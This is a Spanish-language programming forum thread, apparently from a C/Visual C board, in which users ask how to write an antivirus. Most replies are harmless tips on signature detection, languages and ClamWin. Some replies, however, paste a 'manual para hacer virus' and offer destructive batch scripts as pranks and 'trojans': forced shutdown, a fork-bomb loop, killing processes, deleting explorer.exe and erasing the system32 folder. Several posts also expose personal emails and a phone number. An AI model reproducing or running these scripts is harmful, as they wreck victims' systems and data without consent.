C/Visual C - LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!!

 
Vista:

LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!!

Publicado por Juan (4 intervenciones) el 14/02/2007 13:11:36
Alguien sabe decirme con que lenguaje de programación se puede hacer un antivirus, por ejemplo el de Panda con que lenguaje está hecho, etc...

Quiero hacer yo uno para probar y me gustaría saber que lenguaje es el mas apropiado o si todos valen.

También como hace un antivirus por ejemplo el de Panda para saber si un fichero está o no infectado, no se si lo abrirá leera su código a ver que hace y para que sirven los PAV.SIG.

Espero vuestras respuestas lo antes posible. Estoy interesado en estos temas para poder llegar a desarrollar mi propio antivirus y dedicarme a este tema.

Saludos
Valora esta pregunta
Me gusta: Está pregunta es útil y esta claraNo me gusta: Está pregunta no esta clara o no es útil
0
Responder

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por Fran (122 intervenciones) el 14/02/2007 13:19:09
mira por lo que se lo podes hacer en cualquier lenguaje... complicado lo de antivirus... bueh, suerte y exitos!!!!
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por sac (1 intervención) el 16/03/2008 04:57:34
okay
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por fredy marin flores (1 intervención) el 18/12/2008 23:32:17
quisiera saber como puedo hacer un antivirus yo mismo

gracias.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por ale (1 intervención) el 05/09/2009 00:14:51
quiero aprender a crear antivirus porque quiero hacer uno para mi proyecto de la universidad
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por anti  (1 intervención) el 30/12/2009 21:25:06
kiero hacer antivirus en lenguaje c++
para un trabajo de la universidad
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por Edward (2 intervenciones) el 22/03/2013 17:47:07
**************************************************************************************
* Pronto voy a hacer un antivirus auto-reprogramable, inmune a todo ataque *
**************************************************************************************
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
-1
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por Daniel (1 intervención) el 10/06/2013 02:19:35
JAJAJA Ni siquiera avira a hecho algo asi
Pero te deseo buena suerte
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por alex (1 intervención) el 23/04/2019 20:58:14
Bueno, buena suerte con lo de ser inmune. Nunca sabes lo que va a pasar hasta que pasa y siempre habra una parte del virus que estara modificada y no la detectara como virus. Es como intentar hacer una vacuna que nos protega de todas las enfermedades habidas, y las que puedan haber. No sabes a que atacaran ni como. Siempre habrá un paciente 0.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por Nicolás Castellanos (1 intervención) el 20/02/2021 00:08:15
Este hombre predijo el futuro hablando del tema que sería el más delicado un año después...
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por Nelek (816 intervenciones) el 14/02/2007 14:26:28
Hola,

yo tampoco estoy muy puesto en el tema, pero lo que si que puedo decir que los ficheros ".sig" vienen de "signature" (Firma en ingles) y son lo que los antivirus (o el panda en este caso) usa para reconocer posibles virus. No estoy seguro, pero supongo que cada virus detectado debe de tener una parte de su codigo que lo haga unico e identificable.

Como detectarlo... pues supongo que si que debe de hacer algo parecido a lo de "buscar texto" del word, teniendo una firma del virus se supongo que lo que hara sera buscar residuos de dicho codigo en los ficheros del pc. Luego ya entran terminos como los de eurestica y demas, en los que ya no tengo ni idea...

El como hacerlo, ufffffffff.... te deseo mucha suerte y espero que seas muy paciente y tenaz, porque va a ser algo como que complicado pero sin el "como".

Saludos
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por Edward (2 intervenciones) el 22/03/2013 17:44:36
**************************************************************************************
* Pronto voy a hacer un antivirus auto-reprogramable, inmune a todo ataque *
**************************************************************************************
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
-1
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por fernando.gomez (1603 intervenciones) el 14/02/2007 16:40:11
Puedes hacerlo en ensamblador ;P
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por LUIS MENDOZA (2 intervenciones) el 04/06/2008 17:37:36
QUE TAL AMIGO PUES EN RESPUESTA A TU PREGUNTA TE DIGO QUE CASI TODO LENGUAJE SIRVE PARA DESARROLLAR UN ANTIVURUS.

PUEDES USAR EL C O EL BASIC O CUALQUIERA DE TU INTERES PERO LO MAS IMPORTANTE ES QUE DEBES TENER CONOCIMIENTOS EN LA PROGRAMACION CON APIS (LIBRERIAS DE WINDOWS).

SABES SOY UN PROGRAMADOR QUE ME ESPECIALIZO EN BASIC Y C Y TE CUENTO QUE RECIEN EMPEZE A DESARROLLAR UN ANTIVIRUS EN LENGIAJE BASIC (VISUAL BASIC 6.0) EL DISEÑO Y CIERTAS HERRAMIENTAS LAS HAGO CON ESTE LENGUAJE Y ALGUNOS MODULOS EN EL LENGUAJE C.

ADEMAS TAMBIEN VOY A UTILIZAR LOS SCRIPTS...

NECESITO PERSONAL, PARA DESARROLLAR LAS VACUNAS, ASI QUE SI SABES PROGRAMAR CONTACTAME A MI CORREO.

[email protected]

SOY DE ECUADOR, ESPECIFICAMENTE DE QUEVEDO

MI NUMERO DE CELULAR ES 090697314
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por pipe oso l (1 intervención) el 27/09/2014 18:19:49
hey amigo yo tambien quiero hacer un antivirus y me disculpas si soy entrometido ,quisiera aprovechar este espacio para ver si alguien me enseña a hacer uno la verdad no se nada de programacion pero me facinan las mates
tengo 23 años y la verdad e dejado correr el tiempo sin saver que era lo que queria hasta que por fin me decidi
quisiera aprender todo lo que se pueda de computacion desde programar hasta estructura dfel pc me facina todo este mundo tecnologico en el que hoy vivimos no quisiera perder mas tiempo la verdad no quiero entrar en una universidad ya que ademas de lo que tu quieres aprender te meten un cerro de materias que nada que ver ademas son como 3 horas por dia lo que estudias enrealidad de lo que tu quieres e escuchado que mucha gente a aprendido empiricamente ya que hay textos y muchas cosas en la web que te ayudan pero que mas bueno que alguien te guie para hacer bn las cosas y equivocarte en lo mas minimo...

un saludo mil disculpas ya que no puedo ayudar en el tema
espero amigo ayas encontrado tu respuesta
igual espero la mia
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por luis (1 intervención) el 02/12/2014 03:36:09
bueno seran mi competencia yo estoy haciendo un virus mucho mejor que un troyano es una serie de combinaciones bendiciones a todos
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

MANUAL PARA HACER ANTIVIRUS

Publicado por DIEGO LOACHAMIN (1 intervención) el 05/06/2008 01:17:25
AMANUAL PARA HACER VIRUD


####################################
####################################
######HACKLAB WWW.FOROHACK.COM######
####################################
BY KEVIN45JKSNJSD

==== virus bat ====

1.Introdución
2.Nuestro primer virus
3.comandos básicos y etiquetas
4.jugando con el registro
5.bucles
6.Nuestro segundo virus
7.variables de windows xp
8.if exist
9.proximamente mas

1.)Introduccion:

Buenas , ante todo he de decir que esto es un manual de introducción y no un manual para expertos.
en este manual se hablara sobre los virus .bat (archivos por lotes ejecutables de ms-dos)
bueno antes que nada explicar que es cmd.exe (MS-DOS EN WINXP) cmd.exe es un interprete de comandos.
¿Qué es un comando?
es una orden que le damos al sistema operativo para que haga una tarea determinada.

2.)Nuestro primer virus.

bueno , nuestro primero virus podría ser este:

@echo off
shutdown -s -t 1

abrimos un documento de texto , copiamos esto lo guardamos como .bat y lo abrimos...

y... sopresa...

explicación: @echo off

Desabilita el echo para que no muestre los comandos , que se ejecutaran posteriormente.

explicación: shutdown

es un comando con el que puedes jugar bastante. -s y -t son parametros, los parametros son como las opciones
que les deves dar al comando. algunos comandos requieren parametros obligatoriamente sin embargo otros no.

explicación: parametro -s y -t

el parametro -s da la orden a shutdown para que apage el equipo y con -t especificamos los segundos. en el ejemplo
de antes pusimos 1 segundo.

otros parametros de shutdown:

shutdown -r = Reinicia
shutdown -c = deja un comentario "Modo de uso">> shutdown -s -t 5 c "Comentario"
shutdown -m = apaga un equipo de la red "Modo de uso">> shutdown -s -t 4 -m \nombredehost
shutdown -f = fuerza el cierre de las aplicaciones.

3.)Comandos básicos

a continuación os pondré varios comandos que sirven mucho a la hora de hacer virus.

-del = borra un archivo
-copy = copia un archivo
-reg = hacer modificaciones en el registro
-net = Muchas funciones, escriban en cmd net /? para ver sus funciones :)
-RD = elimina un directorio
-set = Muestra , establece, crea , variables de entorno de windows.
-taskkill o tskill = mata procesos

3.1)Etiquetas
Las etiquetas sirven para ir de un lugar de un programa a otra parte. ejemplo.

@echo off
echo hola
goto etiquetaB
:etiquetaA
echo ola
:etiquetaB
echo adios

con goto decimos a que etiqueta ir

en este caso la salida en la shell sería:

c: etiquetas.bat

hola
adios

4.)Jugando con el registro.

bueno , como ya dije antes para jugar con el registro usaremos el comando reg :)

Operaciones:

REG QUERY /?
REG ADD /?
REG DELETE /?
REG COPY /?
REG SAVE /?
REG RESTORE /?
REG LOAD /?
REG UNLOAD /?
REG COMPARE /?
REG EXPORT /?
REG IMPORT /?

Usad estos comandos para obtener ayuda sobre los parametros después de reg.

5.)Bucles

Bueno un bucle es repetir muchas veces lo mismo
ejemplo

@echo off
:kevin
echo hola
goto kevin

jejejeje ya podeis imaginaros las cosas que podeis hacer.

otro ejemplo:

@echo off
:uji
start
goto uji

Madre mía.. este simple código , el que lo abra tendrá que reiniciar , por que el pc se le trabará todo.

el comando start lo que hace es abrir otra shell, así que imaginate este bucle infinito. :)

6.)Nuestro segundo virus.

@echo off
taskkill /F /IM msnmsgr.exe
del /F c:windowssystem32explorer.exe
shutdown -s -t 10 -c "Has caido en mis manos"

jejeje

7.)Variables de windows xp

para ver el contenido de estas variables escriban en cmd.exe

echo %NOMBREDELAVARIABLE%

%COMPUTERNAME% = Nombre de host.
%SYSTEMROOT% = Carpeta de administración Normalmente c:windows
%TEMP% = directorio donde se encuentran los archivos temporales
%WINDIR% = directorio de windows.
%USERNAME% = usuario con el que se inicio sesión
%USERPROFILE% = directorio donde se encuentran los archivos del usuario que inicio sesión
%PROGRAMFILE% = directorio donde se encuentran los archivos de programas
%OS% = muestra el sistema operativo que estamos ejecutando
%LOGONSERVER% = nombre de nuestro server (\mihost)

no son todos , pero puse algunos importantes. :)

8.)If exist

if no solo sirve para exist , pero explicare if usando exist.
if exist lo que hace es por ejemplo:
@echo off
if exist c:kevin.txt (goto existe) else goto noexiste
:existe
echo si existe
exit
:noexiste
echo no existe

lo que hace es comprobar si el archivo kevin.txt existe en c: y si existiese iria a la etiqueta :existe
y si no existe iria a noexiste.

Bueno así de simple.

9.)proximamente mas

proximamente segire publicando , ya con un nivel más avansado. y con datos más explicitos.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:MANUAL PARA HACE UN VIRUS BROMA

Publicado por Ronald (1 intervención) el 17/06/2008 20:52:47
manual para crear virus

primer paso es : un clip derecho buscar nuevo y darle acceso directo
segundo paso es :shutdown -s -t 50 -c "virus en tu sistema.alerta!"
terser paso es :darle un clip a continuar
cuarto paso es : escribir :apago
quinto paso es :cambiar el icono darle un clip derecho y darle a propiedades
sexto paso es : darle acambiar icono y ponerle el de apago

y listo tienen un virus para asustar

para mas in formasion escribanme ami correo eletronico es : [email protected]
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
-1
Comentar

RE:MANUAL PARA HACER ANTIVIRUS

Publicado por hackertaker (1 intervención) el 05/11/2008 20:06:30
Me parece de niña ese virus.
Copiad esto y guardodadlo como .bat, es un trojan
@echo off
erase C:\Windows/system32
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:MANUAL PARA HACER ANTIVIRUS

Publicado por luis (1 intervención) el 23/08/2010 19:09:03
QUIERO APRENDOR COMO ASER UN ANTIVIRUS
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
-1
Comentar

RE:MANUAL PARA HACER ANTIVIRUS

Publicado por anonimo (5 intervenciones) el 21/03/2012 01:03:00
no solo es un troyano, se carga todo el sistema del pc ;d
un saludo
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
-1
Comentar
sin imagen de perfil

MANUAL PARA HACER ANTIVIRUS

Publicado por Ruben david (1 intervención) el 10/02/2017 17:46:40
yo tuve un problema con un virus ese virus era parecido a recycler pero este tenia un archivo bat que no permitida eliminarlo ni siquiera formateando la usb tuve que utilizar karpeski fue lo único que función y yo me pregunto como puede un virus no ser eliminado por un formateo

el virus tenia el nombre de drive y creaba muchos accesos directos y ejecutaba unos comandos javascrips
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por leonardo (1 intervención) el 02/02/2009 20:57:59
hola yo tambien tengo mucha curiosidad sobre este tema,si consigues informacion sobre esto por fabor enviamela y si consigues crear el programa podrias embiarmelo,grasias
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por anonimo (5 intervenciones) el 21/03/2012 01:06:54
deberias empezar por aprender como programar en algun lenguaje, y para eso, empieza por escribir correctamente...
porfavor
enviarme
gracias

PD: busca en http://www.google.com y empieza a leer manuales en vez de ser tan comodo, porque si no no vas a aprender nunca.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por PrincipeHacker (1 intervención) el 18/03/2009 18:20:49
Usa el visual basic 6 ese es weno paa esas madres
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por anonimo (5 intervenciones) el 21/03/2012 01:09:51
el visual basic???
eso como mucho sirve para introducir, pero no estes mucho tiempo, o acabaras estancandote
un saludo
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por Pckikin (2 intervenciones) el 14/09/2010 19:43:53
Estreses

Prácticamente hay muchos métodos que utiliza un antivirus para detección de archivos Virus, tu pregunta es fácil? O difícil, te diré todo depende de tu lógica para detección pero bueno eso ya depende de ti yo te digo más o menos como seria la detección de un virus.
1.- Necesitas una cosa llamada Firma de virus esa firma más que nada es: alguna característica que hace único a un archivo para ello puedes contemplar 4 Cosas
1. Extensión
2. Tamaño de Archivo
3. Número de líneas de archivo
4. Lectura de una línea del archivo
Ejemplo de una firma:
Extencion =.exe
Tamaño de archivo= 12354
Numero de líneas=125
Lectura de línea 9= " ëRNTFS ø ? ð ? € € Pt@ ú3ÀŽÐ¼ |ûhÀ¬ hf ˈ "
Sobre Nombre Win32.Ejemplo.UFX

Bien ahora ya tenemos la firma del virus de un virus que le pondremos el nombre de Win32.Ejemplo.UFX

Ahora viene el método de Rastreo lo que hace el antivirus es empezar analizar todos los archivo s de una X Carpeta y/o unidad, supongamos que le vamos a analizar la unidad C
Y Tenemos Dos Archivos llamadas Kasll.exe Kasll.exe y uno de estos es un Win32.Ejemplo.UFX , el primero lo tenemos almacenado en C y el otro en C:\Windows\System32\ ahora sabemos que aparentemente los dos archivos son iguales pero no ahí viene la función de una firma lo primero que hace es sacar su extensión en este caso es .exe luego en segundo lugar saca el tamaño del archivo, tercero Localiza el número de líneas del archivo y 4 Lee un alinea 9 en seguida detectara el archivo infectado o más bien que contiene código malicioso.

Si te das cuenta es un buen trabajo no tanto detectar el archivo sino adquirir la firma del archivo infeccioso, así que si sale un virus nuevos y por lógica no tienes la firma tu antivirus o detector de virus no podrá detectarlo, es por eso que muchos antivirus tienes la opción de enviar archivo sospechoso y cuando llega al centro de análisis tienes máquinas virtuales de prueba para ejecutar el archivo y verificar si realmente es un virus o no y así actualizar su famosa firma de virus.
Esto que te acabo de mencionar es solo un proceso para detectar y todavía falta el proceso de desinfección que es más que nada analizar las accionas del virus y corregirlas.
Si estas muy interesado en crear un desinfectante o antivirus claro que es bueno no te desanimes ya ves que no es muy complicado solo talachudo, la cuestión de la programación es importante pero si puedes manejas un Lenguaje de programación exelente lo podras hacer acuérdate que no tanto es lenguaje de programación si no las maravillas que puedas hacer con el yo he elaborado un desinfectante pero dicen que muchas cabezas piensan más que una asi que manos a la obra cuentan con mi apoyo para crear uno sería bueno un libre no? bueno saludos y pues les dejo mi correo para cualquier cosa [email protected]
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por anonimo (5 intervenciones) el 21/03/2012 01:14:40
hola,
muy interesante y util tu post, he aprendido mucho, gracias.
podrias hacer algun manual basico de los procesos que has mencionado, explicandolos mas detalladamente por favor y poniendo como realiza la busqueda en el sistema, gracias de nuevo.
PD: podrias decirme que es tarachulo???
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por EGR (1 intervención) el 24/09/2010 19:19:10
MIRA YO LO E HECHO ASI NO SE SITE SIRVA
ES vb6
Private sub Command1_click()
dim x
open (Path_archivo) for binary as #1
x=input(lof(1),#1)
close#1
if x=CodigodePrograma then
'EJEMPLO
'This program cannot be run in DOS mode.
'$ ²¾Âbö߬1ö߬1ö߬1ÿ§91õ߬1ÿ§?1ë߬1öß­1 ߬1ÿ§/1é߬1ÿ§'(1ô߬1ÿ§81÷߬1ÿ§=1÷߬1Richö߬1

msgbox"Archivo infectado"
else
msgbox"archivo no infectado"
end if
end sub

o puede ser

'*********************************************************
dim x ,code
code="This program cannot be run in DOS mode." & _
"$ ²¾Âbö߬1ö߬1ö߬1ÿ§91õ߬1ÿ§?1ë߬1öß­ "1߬1ÿ§/1é߬1ÿ§'(1ô߬1ÿ§81÷߬1ÿ§=1÷߬1Richö߬1 "

open (Path_archivo) for binary as #1
x=input(lof(1),#1)
close#1
if instr(1,x,Codigoderogramaoriginal) then
msgbox"Archivo infectado"
else
msgbox"archivo no infectado"
end if msgbox"Archivo infectado"
else
msgbox"archivo no infectado"
end if
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por lui (1 intervención) el 10/02/2013 20:52:49
esta bien pero el problema es que debe de leer cualquier tipo de archivo
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por Pckikin (2 intervenciones) el 11/11/2010 21:27:52
Ahi que trabajar en ello que dices animate mi correo es [email protected]
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

RE:LENGUAJE DE PROGRAMACION PARA HACER ANTIVIRUS!!

Publicado por grammar (1 intervención) el 21/03/2012 01:17:34
disculpa pero ese ahi que has puesto esta mal escrito, es hay de haber.
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar

ANTIVIRUS!!! LAPARA38_EL DAÑINO

Publicado por LANGSNER MANUEL (1 intervención) el 28/12/2010 21:05:55
KIERO ACER YO MI PROPIO ANTIVIRU CON ESTE NONBRE NO INPORTA LA CATEGORI
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar
sin imagen de perfil
Val: 60
Ha mantenido su posición en C/Visual C (en relación al último mes)
Gráfica de C/Visual C

ANTIVIRUS!!! LAPARA38_EL DAÑINO

Publicado por Yamil Bracho (26 intervenciones) el 23/04/2019 21:03:31
Hay un proyecto que lo veo mas que todo como educativo ClamWin, que creo que viene con codigo fuente
Valora esta respuesta
Me gusta: Está respuesta es útil y esta claraNo me gusta: Está respuesta no esta clara o no es útil
0
Comentar